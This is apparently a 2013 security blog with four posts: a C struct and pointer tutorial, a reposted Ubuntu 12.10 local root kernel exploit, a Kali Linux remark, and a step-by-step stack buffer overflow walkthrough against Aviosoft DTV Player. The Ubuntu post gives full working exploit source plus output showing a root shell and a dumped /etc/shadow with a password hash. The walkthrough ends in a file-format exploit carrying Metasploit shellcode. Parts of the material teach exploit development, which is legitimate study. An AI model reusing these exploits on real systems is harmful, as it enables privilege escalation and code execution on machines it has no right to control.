struct,typedef,array and pointer [all togther?]

March 9, 2013, 10:33 am

≫ Next: Ubuntu 12.10 Local Root Exploit

$

0

0

This post is part of http://www.pusheax.com/2013/03/struct-and-typedef-of-c-programming.html . Such as struct, pointer, typedef example. I have did some more advanced things with struct:

#include <stdio.h>
#include <string.h>

intmain()

{
//Yes We can declar a whole sentence in variable(Remember *):
char*str="We need to know programming for being a security resarcher.";




int*ptr;//We declaring c pointer which start with asteric!
int anotherN;// This int variable
    anotherN=1337;//The current value of the declared variable.
int what;//A blank variable has been declared.




    ptr=&anotherN;//This is the pointer trick. ptr now pointing to address of anotherN
    what=*ptr;/*Now what=address_of_anotherN, and anotherN_address=1337. So what=1337.
            Whenever we are going to change the value of a variable using a pointer
            remember that we need the asteric. First we need "&" as reference address.
            then we need the asteric for getting final declaration and the value. */




*ptr=420;/* Remember that anotherN's value was 1337 ? But now it is 420. So we really
            can change the value anything by declaring new value. Remember that it will 
            only change the value of the reference address. So in our case it "anotherN" */




printf("\n\n\n%s\n",str);//Print the value of "str"
printf("Value of what: %d\n",what);
printf("Value of anotherN: %d\n",anotherN);

//Time to go in advanced!




typedefstruct pusheax

{
int push;
char add[20];//It is not a problem using array.
}pUsheax;//The masked name



    pUsheax instanc;//Getting instance name of the struct.
    pUsheax *mypusheax;//Declaring "pusheax" type pointer. Yes we can have pointer in struct.

    mypusheax=&instanc;//Pointing to instanc
    instanc.push=100;//push=100




//Print the value of "push":
printf("The current value of \"push\" is: %d\n",instanc.push);



    mypusheax->push=200;/* Here is tricky? Now we are not changing the value using asteric.
                here we are using dash and "greater than" operator to redirect to
                declard variable. Data actually going mypusheax and mypusheax 
                transfering the data to "push". So it shopisticately chage the value.*/



printf("Now \"push\"= %d\n\n\n",instanc.push);

strcpy(mypusheax->add,"www.pusheax.com");/*store the string pusheax.com in "add" array.
                            strcpy is evil. It causes the buffer overflow
                            if the "add" array gets fill with more than 20
                            value then stack will get overwriten. Because
                            strcpy does not check boundary. More secure function
                            is strncpy() :)*/


printf("\t\t\t\t\t%s\n",instanc.add);//We print the current value of add[20] declared array. 
printf("\t\t\t\t\t---------------\n");
printf("\t\t\t\t\t%s\n\n\n",mypusheax->add);/* We also can get the value of add[] instead calling
                            calling instanc.add */



}

Compile and Run:

push@pusheax:~/code$ gcc strucptr.c -o strucptr
push@pusheax:~/code$ ./strucptr



We need to know programming for being a security resarcher.
Value of what: 1337
Value of anotherN: 420
The current value of "push" is: 100
Now "push"= 200


                                        www.pusheax.com
                                        ---------------
                                        www.pusheax.com


push@pusheax:~/code$

---

Ubuntu 12.10 Local Root Exploit

March 13, 2013, 4:07 am

≫ Next: Backtrack reborn as Kali - downloaded Kali Linux

≪ Previous: struct,typedef,array and pointer [all togther?]

$

0

0

Everybody know Ubuntu is a popular Linux distro(Basically for newbie). Today i was visiting exploitdb and found the Ubuntu 12.10 Local root exploit which worked only on 64bit.

I have tested the code since i had Ubuntu 12.10 installed on my vm already.

Code:

#include<unistd.h>
#include<sys/socket.h>
#include<linux/netlink.h>
#include<netinet/tcp.h>
#include<errno.h>
#include<linux/if.h>
#include<linux/filter.h>
#include<string.h>
#include<stdio.h>
#include<stdlib.h>
#include<linux/sock_diag.h>
#include<linux/inet_diag.h>
#include<linux/unix_diag.h>
#include<sys/mman.h>

typedefint__attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedefunsignedlong__attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
unsignedlong sock_diag_handlers, nl_table;

int__attribute__((regparm(3)))
x()
{
    commit_creds(prepare_kernel_cred(0));
    return -1;
}

char stage1[] = "\xff\x25\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";

intmain() {
    int fd;
    unsigned long mmap_start, mmap_size = 0x10000;
    unsigned family;
    struct {
        struct nlmsghdr nlh;
        struct unix_diag_req r;
    } req;
    char    buf[8192];

    if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){
        printf("Can't create sock diag socket\n");
        return -1;
    }

    memset(&req, 0, sizeof(req));
    req.nlh.nlmsg_len = sizeof(req);
    req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
    req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
    req.nlh.nlmsg_seq = 123456;

    req.r.udiag_states = -1;
    req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;

    /* Ubuntu 12.10 x86_64 */
    req.r.sdiag_family = 0x37;
    commit_creds = (_commit_creds) 0xffffffff8107d180;
    prepare_kernel_cred = (_prepare_kernel_cred) 0xffffffff8107d410;
    mmap_start = 0x1a000;

    if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,
        MAP_SHARED|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {

        printf("mmap fault\n");
        exit(1);
    }

    *(unsigned long *)&stage1[sizeof(stage1)-sizeof(&x)] = (unsigned long)x;
    memset((void *)mmap_start, 0x90, mmap_size);
    memcpy((void *)mmap_start+mmap_size-sizeof(stage1), stage1, sizeof(stage1));

    send(fd, &req, sizeof(req), 0);
    if(!getuid())
        system("/bin/sh");
}

test@weird:~/Documents$ gcc -o ubu *
test@weird:~/Documents$ ls
test.c  ubu
test@weird:~/Documents$ ./ubu
# whoami
root

# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
avahi-autoipd:x:103:106:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
usbmux:x:104:46:usbmux daemon,,,:/home/usbmux:/bin/false
whoopsie:x:105:110::/nonexistent:/bin/false
kernoops:x:106:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
rtkit:x:107:114:RealtimeKit,,,:/proc:/bin/false
colord:x:109:117:colord colour management daemon,,,:/var/lib/colord:/bin/false
lightdm:x:110:118:Light Display Manager:/var/lib/lightdm:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
hplip:x:112:7:HPLIP system user,,,:/var/run/hplip:/bin/false
pulse:x:113:121:PulseAudio daemon,,,:/var/run/pulse:/bin/false
saned:x:114:123::/home/saned:/bin/false
kdm:x:115:65534::/home/kdm:/bin/false
test:x:1000:1000:test,,,:/home/test:/bin/bash

 # cat /etc/shadow

 root:!:15651:0:99999:7:::
daemon:*:15630:0:99999:7:::
bin:*:15630:0:99999:7:::
sys:*:15630:0:99999:7:::
sync:*:15630:0:99999:7:::
games:*:15630:0:99999:7:::
man:*:15630:0:99999:7:::
lp:*:15630:0:99999:7:::
mail:*:15630:0:99999:7:::
news:*:15630:0:99999:7:::
uucp:*:15630:0:99999:7:::
proxy:*:15630:0:99999:7:::
www-data:*:15630:0:99999:7:::
backup:*:15630:0:99999:7:::
list:*:15630:0:99999:7:::
irc:*:15630:0:99999:7:::
gnats:*:15630:0:99999:7:::
nobody:*:15630:0:99999:7:::
libuuid:!:15630:0:99999:7:::
syslog:*:15630:0:99999:7:::
messagebus:*:15630:0:99999:7:::
avahi-autoipd:*:15630:0:99999:7:::
usbmux:*:15630:0:99999:7:::
whoopsie:*:15630:0:99999:7:::
kernoops:*:15630:0:99999:7:::
rtkit:*:15630:0:99999:7:::
colord:*:15630:0:99999:7:::
lightdm:*:15630:0:99999:7:::
avahi:*:15630:0:99999:7:::
hplip:*:15630:0:99999:7:::
pulse:*:15630:0:99999:7:::
saned:*:15630:0:99999:7:::
kdm:*:15650:0:99999:7:::
test:$6$aoMcNoTU$IR6Ug3SthKdI4.ixdwf9rsIRsdz.4OACiabhaoxdd0NoYbjvxa9I.dj7VF7U4OaB7Oy2gDezCXL/oQx9riRXP0:15651:0:99999:7:::

This is really great !

Source: http://www.exploit-db.com/exploits/24746/

Backtrack reborn as Kali - downloaded Kali Linux

March 16, 2013, 11:12 am

≫ Next: Exploit writing - Stack based Buffer overflow

≪ Previous: Ubuntu 12.10 Local Root Exploit

$

0

0

BackTrack Reborn as Kali Linux. Yesterday i have downloaded Kali Linux from http://www.kali.org/downloads/ which has gnome as default DE (Classic mode) . Most penetration testers knows about Backtrack Linux which was Ubuntu based. Now it is based on Debian which is big advantage of it. This is more nice that They made it more simpler and looks beautiful.

It seems they did not included much new tools , maybe they excluded some tools from the Kali Linux. There is also not any directory called /penetesting .

All tools are installed in /usr/bin and /usr/local/sbin . Peoples now need to search the tools using locate,whereis etc if they don't know the name of tools. Truthfully, Kali(Backtrack Linux) now bit hard for newbie and Newbie should not try this pentesting distribution. But believe me, It is now enough good .


Note: using tools is not skid. Everybody uses tools. Operating system itself is a tool. They are skid who are doing the thing without knowing anything. You are good to go with new Kali linux if you are good in Linux(Debian).

Kali: http://www.kali.org/downloads/

Exploit writing - Stack based Buffer overflow

March 26, 2013, 12:01 pm

≫ Next: Port scanning using pbnj!

≪ Previous: Backtrack reborn as Kali - downloaded Kali Linux

$

0

0

There are many exploit writing tutorials. But the corelan's exploit writing tutorials are much much better. If you want to learn exploit development , of course you may get started with corelan too. Anyway,

Today i have tried to exploit an application , found at http://www.exploit-db.com/exploits/22932/ (The exploit script did not work for me). Exploiting the vulnerability was very easy but specifically finding the bad char was bit tricky. At least I was able to find all bad char using Corelan's mona.py and exploited the application successfully.  The following tools i used to develop the exploit:

1. Vmware workstation .

2. Python.

3. Immunity Debbugger .

4. Mona.py. (Copy mona.py to "C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands")

5. Windows XP3 and windows 7.

6. Metasploit.


If you are going to try/build this exploit yourself then you also need those above tools, So make sure to download them as your preparation.

i have downloaded the vulnerable application first and installed on windows xp3 vm.


                                      CRASH AND LENGTH OF BUFFER

The simple crash script was:

print"Creating expoit."
f=open("crash-me.PLF","w") 
push="A"*2000

try:   
    f.write(push)
    f.close()
print"File created"
except:
print"File cannot be created"

It will create a file "crash-me.PLF" . If i open the file in AviSoft DTV Player then it just crashes. Well, Let's Attach with Immunity Debugger to see what is happening.

Click on Debbug>>Run .



Now let's open the "crash-me.PLF" :

So its finally crashed and i saw esp and eip register contains "AAAAAAAA...." :

It clearly indicating that i control EIP which is mean the crash is really exploitable(Explaining later!).   Now it is time to find how many the stack requiring for getting overwritten EIP. So time to work with a great tool mona.py .  There was old odd way to do that but now we can do it using metasploit or mona.py very easily. We already know the application crashed since we sent 2000Bytes junk. So we will create a Cycling Patter using mona.

First i set default working folder for mona:

mona config -set workingfolder c:\mona\%p

Then Mona command is : 

!mona pattern_create 2000

 It just created a file in C:\mona\AviosoftDTV called "pattern.txt" . This time need to edit the script again and put the Cycling patter instead "A".  the full script will be look like this:

print"Creating expoit."
f=open("crash-me.PLF","w") 
push="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co"

try:   
    f.write(push)
    f.close()
print"File created"
except:
print"File cannot be created"

Replacing "A"*2000 with following pattern generated by mona


Now need to regenerate the "crash-me.PLF" file and open with AviSoft DTV(Already attached with debugger) . So the application crashed again but  with mona's Cycling pattern instead "AAAAAA..." . So i need to take note of EIP value. In my case it is "37694136" :

This time we need to figure out the exact bytes to overwrite EIP . For this mona is enough :

!mona pattern_offset 37694136

 It tells that we need 260 bytes to overwrite stack and more 4 bytes we will need to overwrite EIP. So it is 260+4=264 bytes


Let's modify the script again:

print"Creating expoit."
f=open("crash-me.PLF","w") #Create the file

push="A"*260#Found by mona.py 
eip ="BBBB"#more 4 bytes to overwrite EIP
junk="C"*1736#Later will replace this with real shellcode 

try:   
    f.write(push+eip+junk)       
    f.close()
print"File created"
except:
print"File cannot be created"

In the script i have replaced Cycling patter with 260 bytes "A" and more 4 bytes to overwrite EIP with "BBBB" then 1736 bytes (2000-264). If first junk(260 bytes) length is okay then EIP will be "BBBB". Let's try:

See EIP is 42424242=BBBB and ESP(Stack Pointer) is contains CCCC.. But here i see another problem that after EIP  some "CCCC":

0012EB5C   42424242  BBBB
0012EB60   43434343  CCCC
0012EB64   43434343  CCCC
0012EB68   43434343  CCCC
0012EB6C   43434343  CCCC

We really need to jump over these nasty junk. See later on. Anyway, We see we are controlling EIP. Because there are  "BBBB".

Our Next goal will be:

1. Replacing "BBBB" with valid pointer(Pointer to esp and esp will hold shellcode)
2. Solving an(CCCC... after EIP) easy problem.
3. Replacing "CCCCCC..." with real shellcode.

                                                                  FIND EIP
Let's find EIP address. EIP address can be found in application or OS dll. For reliability we should always try to use Application's dll if possible. So In this application i am going to find the EIP from application's dll. Again i will use use mona(mona is very powerful and i know what i am doing.) . So the command should be:

!mona jmp -r esp -o

It will create a file called "jmp.txt" in "C:\mona\AviosoftDTV" and there will be following contents:

0x6034c153 : jmp esp |  {PAGE_EXECUTE_READWRITE} [Configuration.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.2.5.2007 (C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\Configuration.dll)
0x6034c4db : jmp esp |  {PAGE_EXECUTE_READWRITE} [Configuration.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.2.5.2007 (C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\Configuration.dll)
0x6034d9cb : jmp esp |  {PAGE_EXECUTE_READWRITE} [Configuration.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.2.5.2007 (C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\Configuration.dll)
0x6034dc73 : jmp esp |  {PAGE_EXECUTE_READWRITE} [Configuration.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.2.5.2007 (C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\Configuration.dll)
0x640614e3 : jmp esp |  {PAGE_EXECUTE_READWRITE} [MediaPlayerCtrl.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.0.0.2 (C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\MediaPlayerCtrl.dll)
0x640627a3 : jmp esp |  {PAGE_EXECUTE_READWRITE} [MediaPlayerCtrl.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.0.0.2 (C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\MediaPlayerCtrl.dll)
0x64119bc3 : jmp esp |  {PAGE_EXECUTE_READWRITE} [NetReg.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.12.11.2006 (C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\NetReg.dll)
0x6411a7ab : jmp esp |  {PAGE_EXECUTE_READWRITE} [NetReg.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.12.11.2006 (C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\NetReg.dll)

Here i will use 0x6411a7ab. Before that for learning purpose let's find this address manually using Immunity Debugger itself(First we need to trigger the crashed otherwise all dll won't load properly):

1. Immunity Debugger menu : View>> View Executable Modules .
2. Find the "NetReg.dll" and double click on it:

3. Our goal is finding "JMP ESP" . 
4. Right click on the window and Search For>> All Commands>>

5. Now another window will pop up and search for "jmp esp"

I was keeping searching until found the 0x6411a7ab.

                             ATTEMPT TO EXECUTE SHELLCODE
Anyway, let's get back to real work. We need to modify the script put the address in EIP variable instead "BBBB". We should remember that windows is little endian , means we need reverse the address so EIP should be "0x6411a7ab=\xab\xa7\x11\x64". Here is the modified script:

print"Creating expoit."
f=open("crash-me.PLF","w") #Create the file

push="A"*260#Found by mona.py 
eip ="\xab\xa7\x11\x64"#EIP
junk="C"*1500#Later will replace this with real shellcode 

try:   
    f.write(push+eip+junk)      
    f.close()
print"File created"
except:
print"File cannot be created"

Let's run the application through Debugger and it should now have the exact address i have set. Time to make the application execute the shellcode. So i am modifying the script again to make it more safe:

print"Creating expoit."
f=open("crash-me.PLF","w") #Create the file

push="\x90"*260#Found by mona.py, "A" Replaced with nops 
eip ="\xab\xa7\x11\x64"#EIP
junk="\x90"*500#More nops before reach to shellcode 
shellcode="D"*1000#Will replace with shellcode.
try:   
    f.write(push+eip+junk+shellcode)        
    f.close()
print"File created"
except:
print"File cannot be created"

What i did on above script is just replaced all "A" with nops. Nops mean do nothing but pass to next instruction(Not a good idea?). Recently i mentioned that after EIP we see some unnecessary "CCCCCC..."  which will completely break our exploit. Putting enough nops will solve this problem too. Before going to next step let's test it if it is working as i expected.

1. Setting breakpoint at EIP address 0x6411a7ab to make sure that our exploit is reaching to right address. To do that we need to following :

Right click>>Go to >>Expression

2. When new window will pop up , search the eip address,  You may need to search it twice. If found the address then we will see like this:

3. Now press F2. It may warn you about breakpointing to this address but you can ignore the warning. Well, Now i am going to open it(Attached with debugger). It hits the breakpoint and i can see now i am landing to nops directly:

So it worked!

Let's put real shellcode instead "D". It is time to use metasploit to generate windows/exec shellcode to execute calc.exe:

msfpayload windows/exec cmd=calc R |msfencode -b "\x00\x0a" -t c

I tried to avoid the normal bad char "\x00\x0a". And Metasploit  generated following shellcode:

 

[*] x86/shikata_ga_nai succeeded with size 223 (iteration=1)

unsigned char buf[] = 
"\xbe\x28\xc7\x1b\x1f\xd9\xed\xd9\x74\x24\xf4\x58\x31\xc9\xb1"
"\x32\x31\x70\x12\x83\xe8\xfc\x03\x58\xc9\xf9\xea\x64\x3d\x74"
"\x14\x94\xbe\xe7\x9c\x71\x8f\x35\xfa\xf2\xa2\x89\x88\x56\x4f"
"\x61\xdc\x42\xc4\x07\xc9\x65\x6d\xad\x2f\x48\x6e\x03\xf0\x06"
"\xac\x05\x8c\x54\xe1\xe5\xad\x97\xf4\xe4\xea\xc5\xf7\xb5\xa3"
"\x82\xaa\x29\xc7\xd6\x76\x4b\x07\x5d\xc6\x33\x22\xa1\xb3\x89"
"\x2d\xf1\x6c\x85\x66\xe9\x07\xc1\x56\x08\xcb\x11\xaa\x43\x60"
"\xe1\x58\x52\xa0\x3b\xa0\x65\x8c\x90\x9f\x4a\x01\xe8\xd8\x6c"
"\xfa\x9f\x12\x8f\x87\xa7\xe0\xf2\x53\x2d\xf5\x54\x17\x95\xdd"
"\x65\xf4\x40\x95\x69\xb1\x07\xf1\x6d\x44\xcb\x89\x89\xcd\xea"
"\x5d\x18\x95\xc8\x79\x41\x4d\x70\xdb\x2f\x20\x8d\x3b\x97\x9d"
"\x2b\x37\x35\xc9\x4a\x1a\x53\x0c\xde\x20\x1a\x0e\xe0\x2a\x0c"

Anyway, Let's modify the script again:

print"Creating expoit."
f=open("crash-me.PLF","w") #Create the file

push="\x90"*260#Found by mona.py 
eip ="\xab\xa7\x11\x64"#EIP
junk="\x90"*500#500 nops before real shellcode
shellcode=("\xbe\x28\xc7\x1b\x1f\xd9\xed\xd9\x74\x24\xf4\x58\x31\xc9\xb1"
"\x32\x31\x70\x12\x83\xe8\xfc\x03\x58\xc9\xf9\xea\x64\x3d\x74"
"\x14\x94\xbe\xe7\x9c\x71\x8f\x35\xfa\xf2\xa2\x89\x88\x56\x4f"
"\x61\xdc\x42\xc4\x07\xc9\x65\x6d\xad\x2f\x48\x6e\x03\xf0\x06"
"\xac\x05\x8c\x54\xe1\xe5\xad\x97\xf4\xe4\xea\xc5\xf7\xb5\xa3"
"\x82\xaa\x29\xc7\xd6\x76\x4b\x07\x5d\xc6\x33\x22\xa1\xb3\x89"
"\x2d\xf1\x6c\x85\x66\xe9\x07\xc1\x56\x08\xcb\x11\xaa\x43\x60"
"\xe1\x58\x52\xa0\x3b\xa0\x65\x8c\x90\x9f\x4a\x01\xe8\xd8\x6c"
"\xfa\x9f\x12\x8f\x87\xa7\xe0\xf2\x53\x2d\xf5\x54\x17\x95\xdd"
"\x65\xf4\x40\x95\x69\xb1\x07\xf1\x6d\x44\xcb\x89\x89\xcd\xea"
"\x5d\x18\x95\xc8\x79\x41\x4d\x70\xdb\x2f\x20\x8d\x3b\x97\x9d"
"\x2b\x37\x35\xc9\x4a\x1a\x53\x0c\xde\x20\x1a\x0e\xe0\x2a\x0c")
shellcode+="\x90"*900#Okay, Need enough junk , so nops instead "A"

all=push+eip+junk+shellcode

try:   
    f.write(all)        
    f.close()
print"File created"
except:
print"File cannot be created"

Well, ReGenerate the "crash-me.PLF" file and opening with the attached avisoft dtv but unfortunately it just crashed....

It does not even land to nops(wtf!). Seems it is happening for bad char, some code has been truncated. But no problem we can find the bad char using mona and this was my new knowledge today learning to use mona to find bad char easily. bad chars can corrupt, truncate our shellcode. If there is any bad chars then our exploits won't work!

So instead spending much time i am going to use mona to find the bad chars(This will be good idea).I am using the first crash PoC again. Let's see how i did it.

                                                    

                                                      FINDING BAD CHARS
First command:

!mona bytearray -b "\x00"

"\x00" is common bad char so i used it to generate all bytecode using mona.

Mona created two file in C:\mona\AviosoftDTV , 1. bytearray.txt 2. bytearray.bin . bytearray.bin is binary which will need later for comparing.


Well, in bytearray.txt are following contents :

Modify the script and put the generated output to the script right after  variable push="A"*2000 :

print"Creating expoit."
f=open("badchar.PLF","w") #Create the file

push="A"*2000#Found by mona.py
push+=("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 


try:   
    f.write(push)       
    f.close()
print"File created"
except:
print"File cannot be created"

Now generate the file "badchar.PLF". Attach the application with debugger, run, open "badchar.PLF" and use another mona command is :

!mona compare -f C:\mona\AviosoftDTV\bytearray.bin

It will create another file called "compare.txt" when we will see like this:

open "compare.txt" in notepad and search for "stack"(http://pastebin.com/YLCnyne7) and after scrolling down a little bit i can see :

                | File           | Memory         | Note       
---------------------------------------------------------------
0   0   9   9   | 01 ... 09      | 01 ... 09      | unmodified!
---------------------------------------------------------------
9   9   99  100 | 0a ... 6c      | 00 ... 61      | expanded   
108 109 1   1   | 6d             | 6d             | unmodified!
109 110 5   5   | 6e 6f 70 71 72 | 20 46 69 6c 65 | corrupted  
114 115 1   1   | 73             | 73             | unmodified!
115 116 2   2   | 74 75          | 5c 41          | corrupted  
117 118 1   1   | 76             | 76             | unmodified!
118 119 137 137 | 77 ... ff      | 69 ... 00      | corrupted  

Possibly bad chars: 0a
Bytes omitted from input: 00

